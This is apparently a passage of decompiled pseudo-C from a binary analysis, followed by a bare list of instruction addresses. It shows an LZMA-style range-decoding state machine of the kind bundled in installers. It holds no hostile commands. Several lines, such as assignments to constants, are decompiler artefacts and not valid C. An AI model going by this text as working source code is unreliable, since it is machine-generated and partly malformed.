                                            											 *(__ebp - 0x2c) = __eax;
                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            											L89:
                                            											__eax =  *(__ebp - 4);
                                            											 *(__ebp - 0x80) = 0x15;
                                            											__eax =  *(__ebp - 4) + 0xa68;
                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                            											goto L69;
                                            										case 0xc:
                                            											L99:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xc;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t334 = __ebp - 0x70;
                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t334;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											__eax =  *(__ebp - 0x2c);
                                            											goto L101;
                                            										case 0xd:
                                            											L37:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xd;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t122 = __ebp - 0x70;
                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t122;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L39:
                                            											__eax =  *(__ebp - 0x40);
                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            												goto L48;
                                            											}
                                            											__eflags = __ebx - 0x100;
                                            											if(__ebx >= 0x100) {
                                            												goto L54;
                                            											}
                                            											L41:
                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            											 *(__ebp - 0x48) = __eax;
                                            											__eax = __eax + 1;
                                            											__eax = __eax << 8;
                                            											__eax = __eax + __ebx;
                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            											__ax =  *__esi;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__edx = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												 *(__ebp - 0x40) = 1;
                                            												__cx = __ax >> 5;
                                            												__eflags = __eax;
                                            												__ebx = __ebx + __ebx + 1;
                                            												 *__esi = __ax;
                                            											} else {
                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edx;
                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            												__ebx = __ebx + __ebx;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											 *(__ebp - 0x44) = __ebx;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L39;
                                            											} else {
                                            												goto L37;
                                            											}
                                            										case 0xe:
                                            											L46:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xe;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t156 = __ebp - 0x70;
                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t156;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											while(1) {
                                            												L48:
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													break;
                                            												}
                                            												__eax =  *(__ebp - 0x58);
                                            												__edx = __ebx + __ebx;
                                            												__ecx =  *(__ebp - 0x10);
                                            												__esi = __edx + __eax;
                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													_t170 = __edx + 1; // 0x1
                                            													__ebx = _t170;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													continue;
                                            												} else {
                                            													goto L46;
                                            												}
                                            											}
                                            											L54:
                                            											_t173 = __ebp - 0x34;
                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                            											__eflags =  *_t173;
                                            											goto L55;
                                            										case 0xf:
                                            											L58:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xf;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t203 = __ebp - 0x70;
                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t203;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L60:
                                            											__eflags = __ebx - 0x100;
                                            											if(__ebx >= 0x100) {
                                            												L55:
                                            												__al =  *(__ebp - 0x44);
                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            												goto L56;
                                            											}
                                            											L61:
                                            											__eax =  *(__ebp - 0x58);
                                            											__edx = __ebx + __ebx;
                                            											__ecx =  *(__ebp - 0x10);
                                            											__esi = __edx + __eax;
                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                            											__ax =  *__esi;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__edi = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												_t217 = __edx + 1; // 0x1
                                            												__ebx = _t217;
                                            												__cx = __ax >> 5;
                                            												__eflags = __eax;
                                            												 *__esi = __ax;
                                            											} else {
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edi;
                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            												__ebx = __ebx + __ebx;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											 *(__ebp - 0x44) = __ebx;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L60;
                                            											} else {
                                            												goto L58;
                                            											}
                                            										case 0x10:
                                            											L109:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0x10;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t365 = __ebp - 0x70;
                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t365;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											goto L111;
                                            										case 0x11:
                                            											L69:
                                            											__esi =  *(__ebp - 0x58);
                                            											 *(__ebp - 0x84) = 0x12;
                                            											while(1) {
                                            												 *(_t613 - 0x54) = _t606;
                                            												goto L133;
                                            											}
                                            										case 0x12:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 0x58);
                                            												 *(__ebp - 0x84) = 0x13;
                                            												__esi =  *(__ebp - 0x58) + 2;
                                            												while(1) {
                                            													 *(_t613 - 0x54) = _t606;
                                            													goto L133;
                                            												}
                                            											}
                                            											__eax =  *(__ebp - 0x4c);
                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax =  *(__ebp - 0x4c) << 4;
                                            											__eflags = __eax;
                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                            											goto L130;
                                            										case 0x13:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												_t469 = __ebp - 0x58;
                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            												__eflags =  *_t469;
                                            												 *(__ebp - 0x30) = 0x10;
                                            												 *(__ebp - 0x40) = 8;
                                            												L144:
                                            												 *(__ebp - 0x7c) = 0x14;
                                            												goto L145;
                                            											}
                                            											__eax =  *(__ebp - 0x4c);
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax =  *(__ebp - 0x4c) << 4;
                                            											 *(__ebp - 0x30) = 8;
                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            											L130:
                                            											 *(__ebp - 0x58) = __eax;
                                            											 *(__ebp - 0x40) = 3;
                                            											goto L144;
                                            										case 0x14:
                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            											__eax =  *(__ebp - 0x80);
                                            											 *(_t613 - 0x88) = _t533;
                                            											goto L1;
                                            										case 0x15:
                                            											__eax = 0;
                                            											__eflags =  *(__ebp - 0x38) - 7;
                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            											__al = __al & 0x000000fd;
                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            											goto L120;
                                            										case 0x16:
                                            											__eax =  *(__ebp - 0x30);
                                            											__eflags = __eax - 4;
                                            											if(__eax >= 4) {
                                            												_push(3);
                                            												_pop(__eax);
                                            											}
                                            											__ecx =  *(__ebp - 4);
                                            											 *(__ebp - 0x40) = 6;
                                            											__eax = __eax << 7;
                                            											 *(__ebp - 0x7c) = 0x19;
                                            											 *(__ebp - 0x58) = __eax;
                                            											goto L145;
                                            										case 0x17:
                                            											L145:
                                            											__eax =  *(__ebp - 0x40);
                                            											 *(__ebp - 0x50) = 1;
                                            											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                            											goto L149;
                                            										case 0x18:
                                            											L146:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0x18;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t484 = __ebp - 0x70;
                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t484;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L148:
                                            											_t487 = __ebp - 0x48;
                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                            											__eflags =  *_t487;
                                            											L149:
                                            											__eflags =  *(__ebp - 0x48);
                                            											if( *(__ebp - 0x48) <= 0) {
                                            												__ecx =  *(__ebp - 0x40);
                                            												__ebx =  *(__ebp - 0x50);
                                            												0 = 1;
                                            												__eax = 1 << __cl;
                                            												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                            												__eax =  *(__ebp - 0x7c);
                                            												 *(__ebp - 0x44) = __ebx;
                                            												while(1) {
                                            													 *(_t613 - 0x88) = _t533;
                                            													goto L1;
                                            												}
                                            											}
                                            											__eax =  *(__ebp - 0x50);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            											__eax =  *(__ebp - 0x58);
                                            											__esi = __edx + __eax;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__ax =  *__esi;
                                            											__edi = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												__cx = __ax >> 5;
                                            												__eax = __eax - __ecx;
                                            												__edx = __edx + 1;
                                            												__eflags = __edx;
                                            												 *__esi = __ax;
                                            												 *(__ebp - 0x50) = __edx;
                                            											} else {
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edi;
                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L148;
                                            											} else {
                                            												goto L146;
                                            											}
                                            										case 0x19:
                                            											__eflags = __ebx - 4;
                                            											if(__ebx < 4) {
                                            												 *(__ebp - 0x2c) = __ebx;
                                            												L119:
                                            												_t393 = __ebp - 0x2c;
                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                            												__eflags =  *_t393;
                                            												L120:
                                            												__eax =  *(__ebp - 0x2c);
                                            												__eflags = __eax;
                                            												if(__eax == 0) {
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            													goto L170;
                                            												}
                                            												__eflags = __eax -  *(__ebp - 0x60);
                                            												if(__eax >  *(__ebp - 0x60)) {
                                            													goto L171;
                                            												}
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            												__eax =  *(__ebp - 0x30);
                                            												_t400 = __ebp - 0x60;
                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            												__eflags =  *_t400;
                                            												goto L123;
                                            											}
                                            											__ecx = __ebx;
                                            											__eax = __ebx;
                                            											__ecx = __ebx >> 1;
                                            											__eax = __ebx & 0x00000001;
                                            											__ecx = (__ebx >> 1) - 1;
                                            											__al = __al | 0x00000002;
                                            											__eax = (__ebx & 0x00000001) << __cl;
                                            											__eflags = __ebx - 0xe;
                                            											 *(__ebp - 0x2c) = __eax;
                                            											if(__ebx >= 0xe) {
                                            												__ebx = 0;
                                            												 *(__ebp - 0x48) = __ecx;
                                            												L102:
                                            												__eflags =  *(__ebp - 0x48);
                                            												if( *(__ebp - 0x48) <= 0) {
                                            													__eax = __eax + __ebx;
                                            													 *(__ebp - 0x40) = 4;
                                            													 *(__ebp - 0x2c) = __eax;
                                            													__eax =  *(__ebp - 4);
                                            													__eax =  *(__ebp - 4) + 0x644;
                                            													__eflags = __eax;
                                            													L108:
                                            													__ebx = 0;
                                            													 *(__ebp - 0x58) = __eax;
                                            													 *(__ebp - 0x50) = 1;
                                            													 *(__ebp - 0x44) = 0;
                                            													 *(__ebp - 0x48) = 0;
                                            													L112:
                                            													__eax =  *(__ebp - 0x40);
                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            														_t391 = __ebp - 0x2c;
                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                            														__eflags =  *_t391;
                                            														goto L119;
                                            													}
                                            													__eax =  *(__ebp - 0x50);
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            													__eax =  *(__ebp - 0x58);
                                            													__esi = __edi + __eax;
                                            													 *(__ebp - 0x54) = __esi;
                                            													__ax =  *__esi;
                                            													__ecx = __ax & 0x0000ffff;
                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                            													if( *(__ebp - 0xc) >= __edx) {
                                            														__ecx = 0;
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            														__ecx = 1;
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            														__ebx = 1;
                                            														__ecx =  *(__ebp - 0x48);
                                            														__ebx = 1 << __cl;
                                            														__ecx = 1 << __cl;
                                            														__ebx =  *(__ebp - 0x44);
                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                            														__cx = __ax;
                                            														__cx = __ax >> 5;
                                            														__eax = __eax - __ecx;
                                            														__edi = __edi + 1;
                                            														__eflags = __edi;
                                            														 *(__ebp - 0x44) = __ebx;
                                            														 *__esi = __ax;
                                            														 *(__ebp - 0x50) = __edi;
                                            													} else {
                                            														 *(__ebp - 0x10) = __edx;
                                            														0x800 = 0x800 - __ecx;
                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            														 *__esi = __dx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														L111:
                                            														_t368 = __ebp - 0x48;
                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                            														__eflags =  *_t368;
                                            														goto L112;
                                            													} else {
                                            														goto L109;
                                            													}
                                            												}
                                            												__ecx =  *(__ebp - 0xc);
                                            												__ebx = __ebx + __ebx;
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            													__ecx =  *(__ebp - 0x10);
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            													__ebx = __ebx | 0x00000001;
                                            													__eflags = __ebx;
                                            													 *(__ebp - 0x44) = __ebx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													L101:
                                            													_t338 = __ebp - 0x48;
                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                            													__eflags =  *_t338;
                                            													goto L102;
                                            												} else {
                                            													goto L99;
                                            												}
                                            											}
                                            											__edx =  *(__ebp - 4);
                                            											__eax = __eax - __ebx;
                                            											 *(__ebp - 0x40) = __ecx;
                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            											goto L108;
                                            										case 0x1a:
                                            											L56:
                                            											__eflags =  *(__ebp - 0x64);
                                            											if( *(__ebp - 0x64) == 0) {
                                            												 *(__ebp - 0x88) = 0x1a;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x68);
                                            											__al =  *(__ebp - 0x5c);
                                            											__edx =  *(__ebp - 8);
                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            											 *( *(__ebp - 0x68)) = __al;
                                            											__ecx =  *(__ebp - 0x14);
                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                            											__eax = __ecx + 1;
                                            											__edx = 0;
                                            											_t192 = __eax %  *(__ebp - 0x74);
                                            											__eax = __eax /  *(__ebp - 0x74);
                                            											__edx = _t192;
                                            											goto L79;
                                            										case 0x1b:
                                            											L75:
                                            											__eflags =  *(__ebp - 0x64);
                                            											if( *(__ebp - 0x64) == 0) {
                                            												 *(__ebp - 0x88) = 0x1b;
                                            												goto L170;
                                            											}
                                            											__eax =  *(__ebp - 0x14);
                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            											__eflags = __eax -  *(__ebp - 0x74);
                                            											if(__eax >=  *(__ebp - 0x74)) {
                                            												__eax = __eax +  *(__ebp - 0x74);
                                            												__eflags = __eax;
                                            											}
                                            											__edx =  *(__ebp - 8);
                                            											__cl =  *(__eax + __edx);
                                            											__eax =  *(__ebp - 0x14);
                                            											 *(__ebp - 0x5c) = __cl;
                                            											 *(__eax + __edx) = __cl;
                                            											__eax = __eax + 1;
                                            											__edx = 0;
                                            											_t274 = __eax %  *(__ebp - 0x74);
                                            											__eax = __eax /  *(__ebp - 0x74);
                                            											__edx = _t274;
                                            											__eax =  *(__ebp - 0x68);
                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            											_t283 = __ebp - 0x64;
                                            											 *_t283 =  *(__ebp - 0x64) - 1;
                                            											__eflags =  *_t283;
                                            											 *( *(__ebp - 0x68)) = __cl;
                                            											L79:
                                            											 *(__ebp - 0x14) = __edx;
                                            											goto L80;
                                            										case 0x1c:
                                            											while(1) {
                                            												L123:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													break;
                                            												}
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__edx =  *(__ebp - 8);
                                            												__cl =  *(__eax + __edx);
                                            												__eax =  *(__ebp - 0x14);
                                            												 *(__ebp - 0x5c) = __cl;
                                            												 *(__eax + __edx) = __cl;
                                            												__eax = __eax + 1;
                                            												__edx = 0;
                                            												_t414 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t414;
                                            												__eax =  *(__ebp - 0x68);
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            												__eflags =  *(__ebp - 0x30);
                                            												 *( *(__ebp - 0x68)) = __cl;
                                            												 *(__ebp - 0x14) = _t414;
                                            												if( *(__ebp - 0x30) > 0) {
                                            													continue;
                                            												} else {
                                            													L80:
                                            													 *(__ebp - 0x88) = 2;
                                            													goto L1;
                                            												}
                                            											}
                                            											 *(__ebp - 0x88) = 0x1c;
                                            											goto L170;
                                            									}
                                            								}
                                            								L171:
                                            								_t535 = _t534 | 0xffffffff;
                                            								goto L172;
                                            							}
                                            						}
                                            					}
                                            				}
                                            			}













                                            0x004062be
                                            0x004062c0
                                            0x004062c6
                                            0x004062c9
                                            0x004062cc
                                            0x004062cf
                                            0x004062d2
                                            0x004062d5
                                            0x004062d8
                                            0x004062f4
                                            0x004062f7
                                            0x004062fa
                                            0x004062fd
                                            0x00406304
                                            0x00406308
                                            0x0040630a
                                            0x0040630e
                                            0x004062da
                                            0x004062da
                                            0x004062de
                                            0x004062e6
                                            0x004062eb
                                            0x004062ed
                                            0x004062ef
                                            0x004062ef
                                            0x00406311
                                            0x00406318
                                            0x0040631b
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406326
                                            0x00406326
                                            0x0040632a
                                            0x004069ea
                                            0x00000000
                                            0x004069ea
                                            0x00406330
                                            0x00406333
                                            0x00406336
                                            0x0040633a
                                            0x0040633d
                                            0x00406343
                                            0x00406345
                                            0x00406345
                                            0x00406345
                                            0x00406348
                                            0x0040634b
                                            0x0040634b
                                            0x0040634b
                                            0x00406351
                                            0x00000000
                                            0x00000000
                                            0x00406353
                                            0x00406356
                                            0x00406359
                                            0x0040635c
                                            0x0040635f
                                            0x00406362
                                            0x00406365
                                            0x00406368
                                            0x0040636b
                                            0x0040636e
                                            0x00406371
                                            0x00406389
                                            0x0040638c
                                            0x0040638f
                                            0x00406392
                                            0x00406392
                                            0x00406395
                                            0x00406399
                                            0x0040639b
                                            0x00406373
                                            0x00406373
                                            0x0040637b
                                            0x00406380
                                            0x00406382
                                            0x00406384
                                            0x00406384
                                            0x0040639e
                                            0x004063a5
                                            0x004063a8
                                            0x00000000
                                            0x004063aa
                                            0x00000000
                                            0x004063aa
                                            0x004063a8
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x00000000
                                            0x00000000
                                            0x004063ea
                                            0x004063ea
                                            0x004063ee
                                            0x004069f6
                                            0x00000000
                                            0x004069f6
                                            0x004063f4
                                            0x004063f7
                                            0x004063fa
                                            0x004063fe
                                            0x00406401
                                            0x00406407
                                            0x00406409
                                            0x00406409
                                            0x00406409
                                            0x0040640c
                                            0x0040640f
                                            0x0040640f
                                            0x00406415
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x00000000
                                            0x004063b6
                                            0x00406417
                                            0x00406417
                                            0x0040641a
                                            0x0040641d
                                            0x00406420
                                            0x00406423
                                            0x00406426
                                            0x00406429
                                            0x0040642c
                                            0x0040642f
                                            0x00406432
                                            0x00406435
                                            0x0040644d
                                            0x00406450
                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645d
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406462
                                            0x00406469
                                            0x0040646c
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x004064cb
                                            0x004064cb
                                            0x004064ce
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00000000
                                            0x0040680a
                                            0x0040680e
                                            0x00406830
                                            0x00406833
                                            0x0040683d
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00406840
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681d
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
